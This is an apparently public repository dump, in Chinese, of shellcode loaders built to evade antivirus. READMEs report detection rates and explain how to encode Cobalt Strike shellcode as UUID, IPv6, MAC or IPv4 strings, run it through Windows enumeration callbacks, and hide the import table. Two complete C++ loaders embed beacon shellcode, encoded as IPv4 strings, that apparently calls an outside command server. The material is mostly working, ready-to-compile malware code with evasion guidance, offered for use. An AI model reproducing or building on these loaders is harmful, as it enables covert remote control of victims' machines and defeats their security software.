时间 | 火绒 | 360 | 腾讯 | 代码 | 14 | | ------ | ------------------------------------ | -------- | ---------- | ---- | ---- | ---- | ---- | 15 | | 0.1 | uuid转化(UuidFromStringA) | 4/68 | 2022-02-18 | √ | √ | √ | c++ | 16 | | 0.2 | base64+uuid转化(UuidFromStringA) | 2/68 | 2022-02-18 | √ | √ | √ | c++ | 17 | | 0.3 | ipv6转化(RtlIpv6StringToAddressA) | 2/68 | 2022-02-21 | √ | √ | √ | c++ | 18 | | 0.4 | mac转化(RtlEthernetStringToAddressA) | 3/67 | 2022-02-21 | √ | √ | √ | c++ | 19 | | 0.5 | ipv4转化(RtlIpv4StringToAddressA) | 2/66 | 2022-03-07 | √ | √ | √ | c++ | 20 | 21 | 22 | 23 | ## 上手指南 24 | 25 | 使用Cobalt Strike生成X64位的shellcode 26 | 27 | ![image-20220218181020741](../images/image-callback-1.png) 28 | 29 | ### 版本0.1 30 | 31 | 
将shellcode替换至./v0.1/trans.py中的buf变量,并执行该脚本。(shellcode -> uuid) 32 | 33 | ```bash 34 | python3 ./v0.1/trans.py 35 | ``` 36 | 37 | ![image-20220218192747863](../images/image-callback-2.png) 38 | 39 | 将转换好的uuid,替换至./v0.1/main.cpp中的uuids字符串数组中 40 | 41 | 编译运行即可。 42 | 43 | 44 | 45 | ### 版本0.2 46 | 47 | 将shellcode替换至./v0.2/trans.py中的buf变量,并执行该脚本。(shellcode -> uuid -> base64) 48 | 49 | ```bash 50 | python3 ./v0.2/trans.py 51 | ``` 52 | 53 | ![image-20220218193413454](../images/image-callback-3.png) 54 | 55 | 将转换好的base64,替换至./v0.2/main.cpp中的uuids_base64数组中 56 | 57 | 编译运行即可。 58 | 59 | 60 | 61 | ### 版本0.3 62 | 63 | 先将shellcode转化为ipv6格式,客户端读取ipv6之后调用RtlIpv6StringToAddressA恢复成shellcode再通过回调函数加载至内存 64 | 65 | 将shellcode替换至./v0.3/trans.py中的buf变量,并执行该脚本。(shellcode -> ipv6) 66 | 67 | ```python 68 | python3 ./v0.3/trans.py 69 | ``` 70 | 71 | ![111](../images/image-callback-5.png) 72 | 73 | 将转换好的ipv6,替换至./v0.3/main.cpp中的ipv6数组中 74 | 75 | 编译运行即可。 76 | 77 | 78 | 79 | ### 版本0.4 80 | 81 | 将shellcode替换至./v0.4/trans.py中的buf变量,并执行该脚本。(shellcode -> mac) 82 | 83 | ```python 84 | python3 ./v0.4/trans.py 85 | ``` 86 | 87 | 将转换好的mac,替换至./v0.4/main.cpp中的mac_数组中 88 | 89 | 编译运行即可。 90 | 91 | 92 | 93 | ### 版本0.5 94 | 95 | 将shellcode替换至./v0.5/trans.py中的buf变量,并执行该脚本。(shellcode -> ipv4) 96 | 97 | ```python 98 | python3 ./v0.5/trans.py 99 | ``` 100 | 101 | 将转换好的ipv4,替换至./v0.5/main.cpp中的ipv4数组中 102 | 103 | 编译运行即可。 104 | 105 | 106 | 107 | 108 | 109 | ## 解决出现黑框情况 110 | 111 | [VS中运行去除黑框](https://github.com/midisec/BypassAnti-Virus/blob/main/common/VS%E4%B8%AD%E8%BF%90%E8%A1%8C%E5%8E%BB%E9%99%A4%E9%BB%91%E6%A1%86.md) 112 | 113 | 114 | 115 | ## 原理分析 116 | 117 | 什么是UUID? 通用唯一标识符 ( Universally Unique Identifier ), 我们可以利用该机制将shellcode转化成uuid,并在运行程序时,将uuid重新转化成shellcode,加载至内存。 118 | 119 | 什么是回调函数? 回调函数(callback)是一个通过函数指针来调用的函数。 120 | 121 | 如何利用回调函数? 
在windows系统中,有许多库函数需要传递一个回调函数,因此我们可以通过该机制,将恶意的shellcode加载至内存。 122 | 123 | ![cucv50oqin](../images/image-callback-4.png) 124 | 125 | WINDOWS库中,可利用的回调函数,经过测试,以下均可以成功执行回调函数加载shellcode。 126 | 127 | ### 可利用的回调函数 128 | 129 | ```c++ 130 | EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0); 131 | EnumTimeFormatsA((TIMEFMT_ENUMPROCA)ha, 0, 0); 132 | EnumWindows((WNDENUMPROC)ha, 0); 133 | EnumDesktopWindows(NULL,(WNDENUMPROC)ha, 0); 134 | EnumThreadWindows(0, (WNDENUMPROC)ha, 0); 135 | EnumSystemGeoID(0, 0, (GEO_ENUMPROC)ha); 136 | EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)ha, 0, 0); 137 | EnumUILanguagesA((UILANGUAGE_ENUMPROCA)ha, 0, 0); 138 | EnumSystemCodePagesA((CODEPAGE_ENUMPROCA)ha, 0); 139 | EnumDesktopsW(NULL,(DESKTOPENUMPROCW)ha, NULL); 140 | EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)ha, 0); 141 | EnumDateFormatsA((DATEFMT_ENUMPROCA)ha, 0, 0); 142 | EnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 143 | 144 | EnumTimeFormatsW((TIMEFMT_ENUMPROCW)ha, NULL, NULL); 145 | EnumUILanguagesW((UILANGUAGE_ENUMPROCW)ha, NULL, NULL); 146 | EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)ha, NULL, NULL, NULL); 147 | EnumSystemLocalesW((LOCALE_ENUMPROCW)ha, NULL); 148 | EnumSystemLocalesEx((LOCALE_ENUMPROCEX)ha, NULL, NULL, NULL); 149 | EnumSystemLanguageGroupsW((LANGUAGEGROUP_ENUMPROCW)ha, NULL, NULL); 150 | EnumSystemGeoNames(NULL, (GEO_ENUMNAMEPROC)ha, NULL); 151 | EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)ha, LGRPID_ARABIC, 0, NULL); 152 | EnumLanguageGroupLocalesA((LANGGROUPLOCALE_ENUMPROCA)ha, LGRPID_ARABIC, 0, NULL); 153 | EnumDateFormatsW((DATEFMT_ENUMPROCW)ha, NULL, NULL); 154 | EnumDateFormatsExW((DATEFMT_ENUMPROCEXW)ha, NULL, NULL); 155 | EnumDateFormatsExEx((DATEFMT_ENUMPROCEXEX)ha, NULL, NULL, NULL); 156 | EnumDateFormatsExA((DATEFMT_ENUMPROCEXA)ha, NULL, NULL); 157 | ``` 158 | 159 | 160 | 161 | IPV6同uuid的原理,先将恶意payload转化成ipv6格式,再通过windows系统库函数去解析成shellcode,再去加载至内存,达到免杀效果。 162 | 163 | 164 | 165 | 166 | 167 | ## 参考 168 | 169 | https://my.oschina.net/u/4079523/blog/5011399 
170 | 171 | https://cloud.tencent.com/developer/article/1819583 172 | 173 | https://mp.weixin.qq.com/s/3Hit7a3hQ97XDHaMSZQ8cQ 174 | 175 | https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumthreadwindows 176 | -------------------------------------------------------------------------------- /callback/v0.5/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Ntdll.lib") 5 | 6 | 7 | // shellcode -> ipv4 8 | const char* ipv4[] = 9 | { 10 | "252.72.131.228", "240.232.200.0", "0.0.65.81", "65.80.82.81", "86.72.49.210", "101.72.139.82", "96.72.139.82", "24.72.139.82", "32.72.139.114", "80.72.15.183", "74.74.77.49", "201.72.49.192", "172.60.97.124", "2.44.32.65", "193.201.13.65", "1.193.226.237", "82.65.81.72", "139.82.32.139", "66.60.72.1", "208.102.129.120", "24.11.2.117", "114.139.128.136", "0.0.0.72", "133.192.116.103", "72.1.208.80", "139.72.24.68", "139.64.32.73", "1.208.227.86", "72.255.201.65", "139.52.136.72", "1.214.77.49", "201.72.49.192", "172.65.193.201", "13.65.1.193", "56.224.117.241", "76.3.76.36", "8.69.57.209", "117.216.88.68", "139.64.36.73", "1.208.102.65", "139.12.72.68", "139.64.28.73", "1.208.65.139", "4.136.72.1", "208.65.88.65", "88.94.89.90", "65.88.65.89", "65.90.72.131", "236.32.65.82", "255.224.88.65", "89.90.72.139", "18.233.79.255", "255.255.93.106", "0.73.190.119", "105.110.105.110", "101.116.0.65", "86.73.137.230", "76.137.241.65", "186.76.119.38", "7.255.213.72", "49.201.72.49", "210.77.49.192", "77.49.201.65", "80.65.80.65", "186.58.86.121", "167.255.213.233", "147.0.0.0", "90.72.137.193", "65.184.187.1", "0.0.77.49", "201.65.81.65", "81.106.3.65", "81.65.186.87", "137.159.198.255", "213.235.121.91", "72.137.193.72", "49.210.73.137", "216.77.49.201", "82.104.0.50", "192.132.82.82", "65.186.235.85", "46.59.255.213", "72.137.198.72", "131.195.80.106", "10.95.72.137", "241.186.31.0", "0.0.106.0", "104.128.51.0", 
"0.73.137.224", "65.185.4.0", "0.0.65.186", "117.70.158.134", "255.213.72.137", "241.72.137.218", "73.199.192.255", "255.255.255.77", "49.201.82.82", "65.186.45.6", "24.123.255.213", "133.192.15.133", "157.1.0.0", "72.255.207.15", "132.140.1.0", "0.235.179.233", "228.1.0.0", "232.130.255.255", "255.47.108.122", "54.65.0.247", "96.89.109.156", "120.7.20.127", "144.60.181.242", "209.153.157.145", "194.102.196.110", "23.63.184.67", "179.238.69.40", "239.143.206.123", "91.6.145.44", "46.164.42.231", "104.222.185.242", "130.222.174.158", "145.231.245.48", "56.159.107.228", "64.90.7.188", "207.21.145.153", "224.95.148.62", "0.165.15.253", "0.85.115.101", "114.45.65.103", "101.110.116.58", "32.77.111.122", "105.108.108.97", "47.53.46.48", "32.40.99.111", "109.112.97.116", "105.98.108.101", "59.32.77.83", "73.69.32.49", "48.46.48.59", "32.87.105.110", "100.111.119.115", "32.78.84.32", "54.46.50.59", "32.87.105.110", "54.52.59.32", "120.54.52.59", "32.84.114.105", "100.101.110.116", "47.54.46.48", "59.32.77.65", "65.82.74.83", "41.13.10.0", "113.228.251.196", "58.198.106.53", "14.148.214.212", "54.120.247.73", "157.85.38.149", "172.70.251.5", "106.246.88.92", "159.49.139.238", "67.46.249.240", "140.106.72.106", "240.232.137.136", "21.50.23.107", "229.88.1.183", "108.176.150.196", "127.73.81.52", "40.94.185.152", "124.77.186.28", "226.53.69.37", "113.218.75.31", "127.103.183.125", "158.176.168.127", "11.237.138.92", "18.169.98.90", "9.129.183.185", "16.179.139.221", "152.233.111.98", "30.169.137.47", "250.159.38.102", "22.177.59.208", "176.195.50.177", "224.13.249.163", "65.0.35.208", "113.113.192.26", "115.241.64.4", "59.174.87.22", "124.66.12.72", "49.151.96.122", "172.96.197.199", "133.98.186.188", "239.254.98.164", "125.14.121.117", "75.71.184.109", "66.72.223.74", "51.100.208.134", "59.41.177.155", "222.220.154.182", "204.28.54.222", "81.12.79.164", "131.133.133.175", "125.35.28.86", "219.134.190.145", "0.65.190.240", "181.162.86.255", "213.72.49.201", "186.0.0.64", 
"0.65.184.0", "16.0.0.65", "185.64.0.0", "0.65.186.88", "164.83.229.255", "213.72.147.83", "83.72.137.231", "72.137.241.72", "137.218.65.184", "0.32.0.0", "73.137.249.65", "186.18.150.137", "226.255.213.72", "131.196.32.133", "192.116.182.102", "139.7.72.1", "195.133.192.117", "215.88.88.88", "72.5.0.0", "0.0.80.195", "232.127.253.255", "255.49.46.49", "53.46.56.48", "46.49.48.50", "0.73.150.2", "210.0.0.0" 11 | }; 12 | 13 | 14 | int main() 15 | { 16 | HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 17 | void* ha = HeapAlloc(hc, 0, 0x100000); 18 | DWORD_PTR hptr = (DWORD_PTR)ha; 19 | int elems = sizeof(ipv4) / sizeof(ipv4[0]); 20 | PCSTR Terminator = ""; 21 | 22 | for (int i = 0; i < elems; i++) { 23 | 24 | if (RtlIpv4StringToAddressA(ipv4[i], FALSE, &Terminator, (in_addr*)hptr) == STATUS_INVALID_PARAMETER) 25 | { 26 | printf("ERROR!"); 27 | return 0; 28 | } 29 | hptr += 4; 30 | } 31 | 32 | // EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0); 33 | // EnumTimeFormatsA((TIMEFMT_ENUMPROCA)ha, 0, 0); 34 | // EnumWindows((WNDENUMPROC)ha, 0); 35 | // EnumDesktopWindows(NULL,(WNDENUMPROC)ha, 0); 36 | // EnumThreadWindows(0, (WNDENUMPROC)ha, 0); 37 | // EnumSystemGeoID(0, 0, (GEO_ENUMPROC)ha); 38 | // EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)ha, 0, 0); 39 | EnumUILanguagesA((UILANGUAGE_ENUMPROCA)ha, 0, 0); 40 | // EnumSystemCodePagesA((CODEPAGE_ENUMPROCA)ha, 0); 41 | // EnumDesktopsW(NULL,(DESKTOPENUMPROCW)ha, NULL); 42 | // EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)ha, 0); 43 | // EnumDateFormatsA((DATEFMT_ENUMPROCA)ha, 0, 0); 44 | // EnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 45 | // CloseHandle(ha); 46 | return 0; 47 | } 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /hide_Import_tables/README.md: -------------------------------------------------------------------------------- 1 | # 免杀方式:隐藏导入表 2 | 3 | 4 | 5 | 
在今年上半年,我们介绍通过[其他形式shellcode的转换+系统回调函数的方式](https://github.com/midisec/BypassAnti-Virus/tree/main/callback)来加载shellcode绕过杀毒软件,随着时间的推移,部分系统回调函数和创建内存的函数已经被列入黑名单中。杀毒软件可以通过计算PE文件的导入表(import address tables)的哈希值来判断该程序是否调用这些敏感函数,进而判断是否为危险程序,本文将介绍通过函数指针的方式调用系统函数,从而隐藏程序导入表。 6 | 7 | 8 | 9 | ## 导入表的查询: 10 | 11 | ### 工具: 12 | 13 | VS2022自带的dumpbin.exe (Path: [vs2022]\VC\Tools\MSVC\14.31.31103\bin\Hostx64\x64\dumpbin.exe) 或 PE查看工具 14 | 15 | ### 使用指南: 16 | 17 | ```bash 18 | dumpbin.exe /imports Project3.exe 19 | ``` 20 | 21 | 22 | 23 | 例如我们查看[回调函数V0.2版本](https://github.com/midisec/BypassAnti-Virus/tree/main/callback/v0.2)中的导入表 24 | 25 | ![image1](../images/image-import-tables-1.png) 26 | 27 | 从中可以看出几个目前已经标记为敏感调用的函数, 28 | 29 | **01**: KERNEL32.dll下用来创建、分配内存的HeapCreate、HeapAlloc; 30 | 31 | **02**: USER32.dll下用来加载shellcode的回调函数EnumChildWindows; 32 | 33 | **03**: RPCRT4.dll下用来shellcode转换的UuidFromStringA。 34 | 35 | 为了避免杀毒软件直接通过PE文件中的导入表进行查杀,我们使用函数指针动态加载这些系统函数。 36 | 37 | 38 | 39 | ## 实现方法 40 | 41 | ### 相关函数 42 | 43 | #### Ⅰ. 获取/加载相关模块的句柄 44 | 45 | GetModuleHandle(TEXT("kernel32.dll")) : 获取kernel32模块,注意必须已由调用进程下模块加载(当前同一模块) 46 | 47 | LoadLibraryA("RPCRT4.dll") : 加载指定的RPCRT4模块,可以是其他模块 48 | 49 | > 其中从上图的导入表中可以看出,USER32.dll和RPCRT4.dll中只调用单个函数(说明进程在调用这些函数时是单独加载的模块),也就是这个模块是需要单独指定加载的,因此只能使用LoadLibraryA而不能使用GetModuleHandle。 50 | 51 | #### Ⅱ. 导出系统函数地址 52 | 53 | GetProcAddress(模块的句柄, 函数名) : 获取系统函数的地址,从而实现动态加载系统函数。 54 | 55 | #### Ⅲ. 定义函数指针执行函数 56 | 57 | 在VS2022中可以通过"Ctrl+左键"的方式查看原先系统函数的定义,例如HeapCreate函数的定义为 58 | 59 | ![image2](../images/image-import-tables-2.png) 60 | 61 | 因此我们可以直接复制并修改,定义一个函数指针ImportHeapCreate,其中的参数以及返回值可以参考上图。 62 | 63 | ```c++ 64 | typedef HANDLE(WINAPI* ImportHeapCreate)( 65 | _In_ DWORD flOptions, 66 | _In_ SIZE_T dwInitialSize, 67 | _In_ SIZE_T dwMaximumSize 68 | ); 69 | ``` 70 | 71 | #### Ⅳ. 通过 Ⅰ和Ⅱ方法组合,动态获取系统函数地址+定义函数指针从而进行函数执行 72 | 73 | 以 HeapCreate、HeapAlloc、UuidFromStringA这三个函数为例 74 | 75 | ```c++ 76 | // 1. 
先根据③中的方法,定义函数指针 77 | typedef HANDLE(WINAPI* ImportHeapCreate)( 78 | _In_ DWORD flOptions, 79 | _In_ SIZE_T dwInitialSize, 80 | _In_ SIZE_T dwMaximumSize 81 | ); 82 | 83 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 84 | _In_ HANDLE hHeap, 85 | _In_ DWORD dwFlags, 86 | _In_ SIZE_T dwBytes 87 | ); 88 | 89 | typedef RPC_STATUS(RPC_ENTRY* ImportUuidFromStringA)( 90 | _In_opt_ RPC_CSTR StringUuid, 91 | _Out_ UUID __RPC_FAR* Uuid 92 | ); 93 | 94 | // 2. 通过获取模块句柄(GetModuleHandle、LoadLibraryA),再通过GetProcAddress导出函数地址 95 | 96 | int main() 97 | { 98 | // 通过GetModuleHandle+GetProcAddress的方式 99 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 100 | ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 101 | 102 | // 通过LoadLibraryA+GetProcAddress的方式 103 | HMODULE hModule = LoadLibraryA("RPCRT4.dll"); 104 | ImportUuidFromStringA MyUuidFromStringA = (ImportUuidFromStringA)GetProcAddress(hModule, "UuidFromStringA"); 105 | 106 | // ... 107 | // ... 
108 | 109 | return 0; 110 | } 111 | 112 | ``` 113 | 114 | 这样一来,我们就将 HeapCreate、HeapAlloc、UuidFromStringA这三个系统函数通过地址并利用函数指针动态调用,并取名为MyHeapCreate、MyHeapAlloc、MyUuidFromStringA。在完整的代码编译后,我们再查询下导入表。(此时在导入表中已经隐藏了HeapCreate、HeapAlloc、UuidFromStringA) 115 | 116 | ![image3](../images/image-import-tables-3.png) 117 | 118 | 119 | 120 | 与此同时,由于时间的推移,我们将之前回调函数中的所有版本进行隐藏导入表的操作,并通过VT查杀的结果,实验对比出具体存在敏感的函数。 121 | 122 | ## 目录 123 | 124 | | 版本号 | 写入内存方式 | VT查杀率 | 时间 | 火绒 | 360 | 腾讯 | 代码 | 125 | | ------ | ----------------------------------------------- | -------- | ---------- | ---- | ---- | ---- | ---- | 126 | | 0.1 | uuid转化(UuidFromStringA)+隐藏导入表 | 7/68 | 2022-07-10 | √ | √ | √ | c++ | 127 | | 0.2 | base64+uuid转化(UuidFromStringA)+隐藏导入表 | 3/68 | 2022-07-10 | √ | √ | √ | c++ | 128 | | 0.3 | ipv6转化(RtlIpv6StringToAddressA)+隐藏导入表 | 6/68 | 2022-07-10 | √ | √ | √ | c++ | 129 | | 0.4 | mac转化(RtlEthernetStringToAddressA)+隐藏导入表 | 7/68 | 2022-07-10 | √ | √ | √ | c++ | 130 | | 0.5 | ipv4转化(RtlIpv4StringToAddressA)+隐藏导入表 | 17/68 | 2022-07-10 | √ | X | √ | c++ | 131 | 132 | 133 | 134 | ## 上手指南 135 | 136 | 各个版本的[使用方法](https://github.com/midisec/BypassAnti-Virus/tree/main/callback#%E4%B8%8A%E6%89%8B%E6%8C%87%E5%8D%97)如同以往一致。 137 | 138 | 139 | 140 | ## VT查杀实验对比结果 141 | 142 | ① HeapCreate、HeapAlloc与部分回调函数组合使用时,会被静态查杀到,可以通过隐藏导入表的方式绕过。 143 | 144 | ② 其中shellcode转换为IPV4(版本0.5),其ipv4数组的**前几个ip地址特征明显**且已经被大多数杀毒软件标记,所以该方法查杀率较高,可以通过**分离shellcode(**分离ipv4数组)的方式或其他编码的形式绕过检测。 145 | 146 | ③ 大部分回调函数没有被标记为敏感函数。 147 | 148 | 149 | 150 | 此外,隐藏导入表是一个综合的方法,可以使用在任何你想调用的系统函数当中,以函数指针执行动态获取地址的方式达到隐藏。 151 | 152 | 153 | 154 | ## 解决出现黑框情况 155 | 156 | [VS中运行去除黑框](https://github.com/midisec/BypassAnti-Virus/blob/main/common/VS%E4%B8%AD%E8%BF%90%E8%A1%8C%E5%8E%BB%E9%99%A4%E9%BB%91%E6%A1%86.md) 157 | 158 | 159 | 160 | ## 参考 161 | 162 | [https://idiotc4t.com/defense-evasion/avtive-call-api](https://idiotc4t.com/defense-evasion/avtive-call-api) 163 | 164 | 
[https://luckyfuture.top/BypassAVLearning4](https://luckyfuture.top/BypassAVLearning4) 165 | 166 | [https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea) 167 | 168 | [https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya) -------------------------------------------------------------------------------- /hide_Import_tables/v0.5/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Ntdll.lib") 5 | 6 | 7 | // shellcode -> ipv4 8 | const char* ipv4[] = 9 | { 10 | "252.72.131.228", "240.232.200.0", "0.0.65.81", "65.80.82.81", "86.72.49.210", "101.72.139.82", "96.72.139.82", "24.72.139.82", "32.72.139.114", "80.72.15.183", "74.74.77.49", "201.72.49.192", "172.60.97.124", "2.44.32.65", "193.201.13.65", "1.193.226.237", "82.65.81.72", "139.82.32.139", "66.60.72.1", "208.102.129.120", "24.11.2.117", "114.139.128.136", "0.0.0.72", "133.192.116.103", "72.1.208.80", "139.72.24.68", "139.64.32.73", "1.208.227.86", "72.255.201.65", "139.52.136.72", "1.214.77.49", "201.72.49.192", "172.65.193.201", "13.65.1.193", "56.224.117.241", "76.3.76.36", "8.69.57.209", "117.216.88.68", "139.64.36.73", "1.208.102.65", "139.12.72.68", "139.64.28.73", "1.208.65.139", "4.136.72.1", "208.65.88.65", "88.94.89.90", "65.88.65.89", "65.90.72.131", "236.32.65.82", "255.224.88.65", "89.90.72.139", "18.233.79.255", "255.255.93.106", "0.73.190.119", "105.110.105.110", "101.116.0.65", "86.73.137.230", "76.137.241.65", "186.76.119.38", "7.255.213.72", "49.201.72.49", "210.77.49.192", "77.49.201.65", "80.65.80.65", "186.58.86.121", "167.255.213.233", "147.0.0.0", "90.72.137.193", "65.184.187.1", "0.0.77.49", "201.65.81.65", 
"81.106.3.65", "81.65.186.87", "137.159.198.255", "213.235.121.91", "72.137.193.72", "49.210.73.137", "216.77.49.201", "82.104.0.50", "192.132.82.82", "65.186.235.85", "46.59.255.213", "72.137.198.72", "131.195.80.106", "10.95.72.137", "241.186.31.0", "0.0.106.0", "104.128.51.0", "0.73.137.224", "65.185.4.0", "0.0.65.186", "117.70.158.134", "255.213.72.137", "241.72.137.218", "73.199.192.255", "255.255.255.77", "49.201.82.82", "65.186.45.6", "24.123.255.213", "133.192.15.133", "157.1.0.0", "72.255.207.15", "132.140.1.0", "0.235.179.233", "228.1.0.0", "232.130.255.255", "255.47.76.112", "88.73.0.223", "230.85.11.199", "11.25.77.180", "116.143.6.137", "138.98.23.143", "194.138.200.33", "160.27.46.63", "249.207.75.50", "114.226.233.116", "45.108.50.245", "210.14.202.177", "138.10.198.242", "248.236.224.92", "128.94.134.98", "36.141.10.16", "81.214.218.175", "132.206.138.138", "167.250.120.24", "151.188.176.80", "0.85.115.101", "114.45.65.103", "101.110.116.58", "32.77.111.122", "105.108.108.97", "47.53.46.48", "32.40.99.111", "109.112.97.116", "105.98.108.101", "59.32.77.83", "73.69.32.49", "48.46.48.59", "32.87.105.110", "100.111.119.115", "32.78.84.32", "54.46.50.59", "32.87.79.87", "54.52.59.32", "84.114.105.100", "101.110.116.47", "54.46.48.59", "32.77.65.71", "87.74.83.41", "13.10.0.206", "117.141.251.125", "219.214.5.27", "203.197.69.250", "126.33.95.229", "195.11.136.243", "34.244.43.247", "85.250.92.110", "189.222.49.153", "187.239.26.30", "238.185.58.177", "86.188.177.70", "86.128.179.241", "123.136.147.162", "118.122.89.149", "74.103.6.45", "203.54.178.81", "133.131.184.252", "89.87.232.91", "33.87.162.31", "192.95.3.16", "225.133.4.176", "96.230.231.167", "152.82.50.64", "68.71.219.97", "183.17.66.90", "242.32.6.183", "198.154.38.237", "94.154.253.135", "158.115.102.169", "233.245.149.199", "116.99.77.45", "171.19.0.245", "230.128.0.244", "105.200.85.222", "230.157.119.44", "183.28.175.34", "233.167.252.28", "55.231.233.214", "209.142.254.48", 
"174.33.159.221", "233.220.98.188", "253.242.104.147", "238.97.76.225", "57.14.12.198", "55.163.227.164", "39.177.114.236", "176.243.251.156", "121.121.245.96", "119.115.205.197", "115.97.1.9", "181.195.117.112", "169.177.78.162", "0.65.190.240", "181.162.86.255", "213.72.49.201", "186.0.0.64", "0.65.184.0", "16.0.0.65", "185.64.0.0", "0.65.186.88", "164.83.229.255", "213.72.147.83", "83.72.137.231", "72.137.241.72", "137.218.65.184", "0.32.0.0", "73.137.249.65", "186.18.150.137", "226.255.213.72", "131.196.32.133", "192.116.182.102", "139.7.72.1", "195.133.192.117", "215.88.88.88", "72.5.0.0", "0.0.80.195", "232.127.253.255", "255.49.46.49", "53.46.56.48", "46.49.48.50", "0.73.150.2", "210.0.0.0" 11 | 12 | }; 13 | 14 | typedef HANDLE(WINAPI* ImportHeapCreate)( 15 | _In_ DWORD flOptions, 16 | _In_ SIZE_T dwInitialSize, 17 | _In_ SIZE_T dwMaximumSize 18 | ); 19 | 20 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 21 | _In_ HANDLE hHeap, 22 | _In_ DWORD dwFlags, 23 | _In_ SIZE_T dwBytes 24 | ); 25 | 26 | typedef NTSTATUS(NTAPI* ImportRtlIpv4StringToAddressA)( 27 | _In_ PCSTR S, 28 | _In_ BOOLEAN Strict, 29 | _Out_ PCSTR* Terminator, 30 | _Out_ struct in_addr* Addr 31 | ); 32 | 33 | typedef BOOL(WINAPI* ImportEnumUILanguagesA)( 34 | _In_ UILANGUAGE_ENUMPROCA lpUILanguageEnumProc, 35 | _In_ DWORD dwFlags, 36 | _In_ LONG_PTR lParam 37 | ); 38 | 39 | 40 | int main() 41 | { 42 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 43 | ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 44 | ImportEnumUILanguagesA MyEnumUILanguagesA = (ImportEnumUILanguagesA)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "EnumUILanguagesA"); 45 | 46 | HMODULE hModule = LoadLibraryA("ntdll.dll"); 47 | ImportRtlIpv4StringToAddressA MyRtlIpv4StringToAddressA = (ImportRtlIpv4StringToAddressA)GetProcAddress(hModule, "RtlIpv4StringToAddressA"); 48 | 49 | 50 | HANDLE 
hc = MyHeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 51 | void* ha = MyHeapAlloc(hc, 0, 0x100000); 52 | DWORD_PTR hptr = (DWORD_PTR)ha; 53 | int elems = sizeof(ipv4) / sizeof(ipv4[0]); 54 | PCSTR Terminator = ""; 55 | 56 | for (int i = 0; i < elems; i++) { 57 | 58 | if (MyRtlIpv4StringToAddressA(ipv4[i], FALSE, &Terminator, (in_addr*)hptr) == STATUS_INVALID_PARAMETER) 59 | { 60 | printf("ERROR!"); 61 | return 0; 62 | } 63 | hptr += 4; 64 | } 65 | 66 | 67 | MyEnumUILanguagesA((UILANGUAGE_ENUMPROCA)ha, 0, 0); 68 | CloseHandle(ha); 69 | return 0; 70 | } 71 | 72 | 73 | 74 | --------------------------------------------------------------------------------